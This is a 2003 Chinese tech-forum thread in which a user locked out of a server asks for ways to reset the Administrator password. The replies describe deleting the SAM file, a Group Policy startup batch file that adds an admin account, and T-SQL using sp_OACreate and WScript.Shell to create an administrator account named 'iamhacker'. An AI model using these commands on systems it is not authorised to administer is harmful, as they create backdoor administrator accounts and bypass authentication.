6,849
社区成员
发帖
与我相关
我的任务
分享请大家快来帮忙。(高级话题:例如通过脚本修改Administrator的密码)
我的服务器被人恶意修改密码了(原因不知)
-----
现在服务器上IIS并没有启动。
我能够用的只有
Remote Administrator和Sql Server
--------
我现在能做的,是用Remote Administrator传一个脚本文件过去,然后用Sql Server执行那个脚本。
Sql Server是使用SqlServer的sa进去的。执行用户是SYSTEM.
那样Sql Server启动的脚本应该也是SYSTEM的权限吧?
但是我以前没有任何脚本访问系统帐户的经验。
所以请大家有什么经验啊,资源啊,相关资料等尽量往下帖。。。
请大家尽快。。。我也正在为我的客户着急呢。。。。
谢谢帮忙解答,帮忙UP。。
谢谢。。
-----
现在服务器上IIS并没有启动。
我能够用的只有
Remote Administrator和Sql Server
--------
我现在能做的,是用Remote Administrator传一个脚本文件过去,然后用Sql Server执行那个脚本。
Sql Server是使用SqlServer的sa进去的。执行用户是SYSTEM.
那样Sql Server启动的脚本应该也是SYSTEM的权限吧?
但是我以前没有任何脚本访问系统帐户的经验。
所以请大家有什么经验啊,资源啊,相关资料等尽量往下帖。。。
请大家尽快。。。我也正在为我的客户着急呢。。。。
谢谢帮忙解答,帮忙UP。。
谢谢。。
...全文
请发表友善的回复…
发表回复
jb81613 2003-01-03
- 打赏
- 举报
你可以在dos下删除%systemroot%winnt/system32/config下的sam文件
然后以空密码登陆
然后以空密码登陆
Lostinet 2003-01-03
- 打赏
- 举报
当然。。我还可以用C++写个COM上去。然后用脚本注册并且执行。
请问怎样用SYSTEM的帐户,修改系统密码?
请问怎样用SYSTEM的帐户,修改系统密码?
Lostinet 2003-01-03
- 打赏
- 举报
原来xp_cmdshell也能做得到。。
ravenkatte 2003-01-03
- 打赏
- 举报
呵呵,初学SQL,只能看懂一点点~~
Lostinet 2003-01-03
- 打赏
- 举报
我刚在CSDN上发了篇文章,是关于SQL SERVER的安全的。。有兴趣的看看:
declare @object int
--创建WScript.Shell
EXEC sp_OACreate 'WScript.Shell',@object OUT
--运行net user iamhacker opendoor /add
--添加一个名字为iamhacker,密码为opendoor的用户
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker添加到Administrators组中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker从Users组中删除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'
declare @object int
--创建WScript.Shell
EXEC sp_OACreate 'WScript.Shell',@object OUT
--运行net user iamhacker opendoor /add
--添加一个名字为iamhacker,密码为opendoor的用户
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker添加到Administrators组中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker从Users组中删除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'
Lostinet 2003-01-03
- 打赏
- 举报
找到了。。谢谢。。
Lostinet 2003-01-03
- 打赏
- 举报
请问哪里有net命令的参考?
ravenkatte 2003-01-03
- 打赏
- 举报
1.用其他系统引导系统,或是把硬盘接到其他机器上!
2.在"%systemroot%\system32\GroupPolicy\Machine\Scripts\startup\script.ini文件中添加:
[Startup]
0CmdLine=AddAdmin.bat
0Parameters=
[Shutdown]
3.做一个BAT文件:
net user admin 123 /add
net localgroup administrators admin /add
放到"%systemroot%\system32\GroupPolicy\Machine\Scripts\startup目录下
4.用忘记密码的系统开机!
5.用admin密码123登陆!
2.在"%systemroot%\system32\GroupPolicy\Machine\Scripts\startup\script.ini文件中添加:
[Startup]
0CmdLine=AddAdmin.bat
0Parameters=
[Shutdown]
3.做一个BAT文件:
net user admin 123 /add
net localgroup administrators admin /add
放到"%systemroot%\system32\GroupPolicy\Machine\Scripts\startup目录下
4.用忘记密码的系统开机!
5.用admin密码123登陆!
ysqu 2003-01-03
- 打赏
- 举报
你知道绿盟么
去那里看看吧
去那里看看吧
Lostinet 2003-01-03
- 打赏
- 举报
不行啊。。机子在电信局,远得很。。
whoamiyxzh 2003-01-03
- 打赏
- 举报
可以用挂从盘的方法,删除winnt/system32/config下的sam文件!! 切记,只能取得SAM的控制权.而不要改变其它文件的权限.
